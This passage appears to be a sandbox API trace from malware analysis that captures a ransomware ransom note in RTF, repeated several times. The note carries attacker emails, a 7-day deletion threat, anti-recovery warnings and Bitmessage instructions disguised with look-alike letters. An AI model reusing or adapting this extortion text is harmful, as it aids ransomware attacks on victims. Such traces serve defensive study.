middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd 